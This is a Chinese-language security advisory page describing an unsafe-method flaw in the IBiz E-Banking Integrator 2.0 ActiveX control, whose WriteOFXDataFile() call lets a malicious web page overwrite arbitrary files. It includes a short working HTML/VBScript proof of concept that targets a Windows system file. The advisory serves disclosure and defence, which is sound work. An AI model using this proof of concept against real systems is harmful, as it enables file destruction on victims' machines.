当前位置: 代码网 > 服务器>网络安全>漏洞分析 > IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用漏洞

IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用漏洞

2008年10月08日 漏洞分析 我要评论
IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用漏洞 受影响系统:/n software IBiz E-Banking Integrator 2.0描述:--------------------------------------------------------------------------------BUGTRAQ ID: 28... 08-10-08
受影响系统:
/n software ibiz e-banking integrator 2.0
描述:
--------------------------------------------------------------------------------
bugtraq id: 28700 ibiz e-banking integrator是用于从银行、投资公司等帐号访问财务交易信息的解决方案。 ibiz e-banking integrator所提供的ibizebank.fiprofile.1 activex控件(fiprofile20.ocx)没有正确地处理对writeofxdatafile()方式的调用,如果用户受骗访问了恶意网页的话,就可能导致以当前登录用户的权限覆盖和破坏系统上的任意文件。 <*来源:shinnai (shinnai@autistici.org)

链接:http://secunia.com/advisories/29758/
*> 测试方法:
-------------------------------------------------------------------------------- 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <object classid='clsid:24445430-f789-11ce-86f8-0020afd8c6db' id='test'></object> <input language=vbscript onclick=tryme() type=button value='click here to start the test'> <script language='vbscript'>
sub tryme()
on error resume next
test.writeofxdatafile "c:\windows\system_.ini"
if err.number <> 0 then
msgbox "something went wrong!"
else
msgbox "exploit completed!"
end if
end sub
</script> 建议:
--------------------------------------------------------------------------------
厂商补丁: /n software
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.nsoftware.com/ibiz/ebank/default.aspx
(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com